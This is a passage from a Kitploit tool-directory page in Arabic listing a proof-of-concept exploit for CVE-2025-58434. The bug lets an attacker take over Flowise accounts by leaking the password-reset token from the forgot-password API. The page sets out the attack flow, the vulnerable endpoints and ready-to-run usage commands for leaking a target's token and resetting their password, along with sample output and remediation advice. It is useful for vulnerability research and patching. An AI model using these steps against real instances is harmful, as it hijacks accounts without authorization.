Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-58434-poc — إثبات المفهوم لاستغلال CVE-2025-58434، يوضح الاستيلاء على الحساب دون مصادقة في Flowise عبر تسريب رموز إعادة تعيين كلمة المرور. يتضمن هجومًا من مرحلتين: تسريب الرمز وإعادة تعيين كلمة المرور. | Kitploit
أدوات/GitHubGitHub/kartik2005221/cve-2025-58434-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالمصادقةالتعلم والتعليمالفريق الأحمر
GitHubkartik2005221/cve-2025-58434-poc

CVE-2025-58434-poc

إثبات المفهوم لاستغلال CVE-2025-58434، يوضح الاستيلاء على الحساب دون مصادقة في Flowise عبر تسريب رموز إعادة تعيين كلمة المرور. يتضمن هجومًا من مرحلتين: تسريب الرمز وإعادة تعيين كلمة المرور.

عرض المستودع
138منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-58434 — استيلاء على حساب Flowise عبر تسريب الرمز

CVE CVSS Python License Disclosure

⚠️ هذا المستودع مخصص للأغراض التعليمية وأبحاث الأمن المصرح بها فقط.
الاستخدام غير المصرح به ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها غير قانوني.


جدول المحتويات

  • نظرة عامة
  • تفاصيل الثغرة
  • تسلسل الهجوم
  • الإصدارات المتأثرة
  • هيكل المستودع
  • المتطلبات
  • التثبيت
  • الاستخدام
  • مثال للإخراج
  • الإصلاح
  • الجدول الزمني للإفصاح
  • المراجع
  • إخلاء المسؤولية

  • نظرة عامة

    يقوم نقطة النهاية forgot-password في Flowise (سواء المستضافة على السحابة أو ذاتياً) بإرجاع رمز إعادة تعيين كلمة المرور الصالح (tempToken) مباشرة في نص استجابة HTTP — بدون أي تحقق من البريد الإلكتروني أو مصادقة.

    هذا يعني أن المهاجم الذي يعرف (أو يمكنه تخمين) عنوان البريد الإلكتروني للضحية يمكنه:

    1. استدعاء نقطة النهاية forgot-password → استلام tempToken في استجابة JSON
    2. استخدام tempToken لاستدعاء reset-password → تعيين كلمة مرور جديدة عشوائية
    3. تسجيل الدخول كالضحية → استيلاء كامل على الحساب (ATO)

    لا حاجة لوصول مسبق، ولا تفاعل من المستخدم، ولا حاجة للوصول إلى البريد الإلكتروني.


    تفاصيل الثغرة

    الحقلالقيمة
    CVE IDCVE-2025-58434
    CVSS Score9.8 (Critical)
    CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    CWECWE-640: آلية استعادة كلمة المرور ضعيفة
    النوعتجاوز المصادقة / تعريض كائن مباشر غير آمن
    التطبيق المتأثرFlowise (سحابة + ذاتي الاستضافة)
    نقطة النهاية 1POST /api/v1/account/forgot-password
    نقطة النهاية 2POST /api/v1/account/reset-password

    السبب الجذري

    يقوم معالج forgot-password بإرجاع سجل المستخدم بالكامل — بما في ذلك tempToken المُنشأ — مباشرة في استجابة API بدلاً من إرساله فقط إلى عنوان البريد الإلكتروني المسجل للمستخدم.

    root@kitploit:~
    {
      "user": {
        "id": "<uuid>",
        "name": "Victim Name",
        "email": "[email protected]",
        "credential": "<bcrypt-hash>",
        "tempToken": "<LEAKED_TOKEN_HERE>",
        "tokenExpiry": "2025-08-19T13:00:33.834Z",
        "status": "active"
      }
    }
    

    تسلسل الهجوم

    root@kitploit:~
    المهاجم                              Flowise API
       │                                       │
       │  POST /forgot-password {email}        │
       │──────────────────────────────────────►│
       │                                       │  (ينشئ tempToken)
       │◄──────────────────────────────────────│
       │  201 { tempToken: "abc123..." }       │
       │                                       │
       │  POST /reset-password {email,         │
       │         tempToken, newPassword}       │
       │──────────────────────────────────────►│
       │                                       │
       │◄──────────────────────────────────────│
       │  200 OK  (تم تغيير كلمة المرور!)      │
       │                                       │
       ✓  اكتمل الاستيلاء على الحساب
    

    الإصدارات المتأثرة

    • Flowise Cloud (cloud.flowiseai.com) — تم التأكد من تأثره
    • جميع عمليات نشر Flowise ذاتية الاستضافة قبل التصحيح

    تحقق من مستودع Flowise الرسمي على GitHub للحصول على معلومات الإصدار المُصحح.


    هيكل المستودع

    root@kitploit:~
    CVE-2025-58434/
    ├── cve_2025_58434_poc.py   # السكربت الرئيسي لـ PoC (هجوم على مرحلتين)
    ├── requirements.txt         # تبعيات بايثون
    ├── README.md                # هذا الملف
    └── DISCLAIMER.md            # إشعار قانوني (اقرأ قبل الاستخدام)
    

    المتطلبات

    • بايثون 3.7 أو أعلى
    • مكتبة requests

    التثبيت

    root@kitploit:~
    # استنساخ المستودع
    git clone https://github.com/yourhandle/CVE-2025-58434
    cd CVE-2025-58434
    
    # تثبيت التبعيات
    pip install -r requirements.txt
    

    الاستخدام

    شاشة المساعدة

    root@kitploit:~
    python3 cve_2025_58434_poc.py --help
    

    المرحلة 1 — تسريب الرمز (استطلاع)

    تأكيد أن المثيل معرض واسترجاع tempToken دون إعادة تعيين أي كلمة مرور.

    root@kitploit:~
    python3 cve_2025_58434_poc.py \
      --url https://flowise.example.com \
      --email [email protected]
    

    المرحلة 2 — استيلاء كامل على الحساب

    استخدام الرمز المسرب لإعادة تعيين كلمة المرور فوراً.

    root@kitploit:~
    python3 cve_2025_58434_poc.py \
      --url https://flowise.example.com \
      --email [email protected] \
      --reset \
      --new-password "MyNewP@ss2025!"
    

    تفريغ استجابة JSON الخام

    root@kitploit:~
    python3 cve_2025_58434_poc.py \
      --url https://flowise.example.com \
      --email [email protected] \
      --json-output
    

    جميع الخيارات

    العلمالاختصارالوصفالقيمة الافتراضية
    --url URL-uعنوان URL الأساسي لمثيل Flowise(مطلوب)
    --email EMAIL-eعنوان البريد الإلكتروني للحساب المستهدف(مطلوب)
    --reset-rتنفيذ المرحلة 2: إعادة تعيين كلمة المرور بالرمز المسربFalse
    --new-password PASS-pكلمة المرور الجديدة لتعيينها (تُستخدم مع --reset)Changeme@2025!
    --timeout SECONDS-tمهلة طلب HTTP10
    --json-output-jطباعة استجابة API JSON الخام إلى stdoutFalse

    مثال للإخراج

    root@kitploit:~
      [الخطوة 1] إرسال طلب forgot-password …
      [*] حالة HTTP : 201
    
      ========================================================================
        بيانات الحساب المسربة
      ========================================================================
        معرف المستخدم : 3fa1c2d4-xxxx-xxxx-xxxx-xxxxxxxxxxxx
        الاسم         : Admin User
        البريد        : [email protected]
        بيانات الاعتماد: $2b$10$xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
        الحالة        : active
        الرمز المؤقت  : eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
        صلاحية الرمز  : 2025-08-19T13:00:33.834Z
      ========================================================================
    
      [+] تم الحصول على tempToken : eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
      [!] معرض: المثيل يسرب رموز إعادة تعيين كلمة المرور دون مصادقة!
    

    الإصلاح

    إذا كنت مشغل مثيل Flowise، فقم بتطبيق التخفيفات التالية فوراً:

    1. لا تقم أبداً بإرجاع رموز إعادة التعيين في استجابات API. أرسل الرمز حصرياً عبر عنوان البريد الإلكتروني المسجل.
    2. أعد رسالة نجاح عامة من forgot-password بغض النظر عن وجود البريد الإلكتروني — فهذا يمنع أيضاً تعداد الحسابات.
    3. فرض قيود على الرمز:
      • استخدام لمرة واحدة (إبطال بعد أول استخدام)
      • صلاحية قصيرة (مثلاً 15 دقيقة)
      • ربط بعنوان IP الخاص بالطالب / وكيل المستخدم حيثما أمكن
    4. طبق الإصلاح على جميع نماذج النشر — السحابة وذاتية الاستضافة.
    5. أضف تحديد المعدل إلى نقطة النهاية forgot-password.
    6. سجل وحذر من النشاط غير الطبيعي لإعادة تعيين كلمة المرور.
    7. فكر في استخدام المصادقة متعددة العوامل (MFA) لحسابات المسؤول وذوي الامتيازات العالية.

    الجدول الزمني للإفصاح

    التاريخالحدث
    2025-08-19تم اكتشاف الثغرة والإبلاغ عنها
    سيحدد لاحقاًإقرار البائع
    سيحدد لاحقاًإصدار التصحيح
    سيحدد لاحقاًالإفصاح العام

    المراجع

    • إشعار GitHub GHSA-wgpv-6j63-x5ph
    • NVD — CVE-2025-58434
    • مستودع Flowise على GitHub
    • CWE-640: آلية استعادة كلمة المرور ضعيفة

    إخلاء المسؤولية

    هذا المشروع مخصص لأغراض تعليمية واختبار الاختراق المصرح به فقط.

    • لا تقم بتشغيل هذه الأداة ضد أي نظام دون إذن كتابي صريح من مالك النظام.
    • المؤلف(ون) من هذا المستودع لا يتحملون أي مسؤولية عن أي استخدام خاطئ أو ضرر أو عواقب قانونية ناتجة عن الاستخدام غير المصرح به.
    • راجع DISCLAIMER.md للحصول على الإشعار القانوني الكامل.
    تنزيل الأداة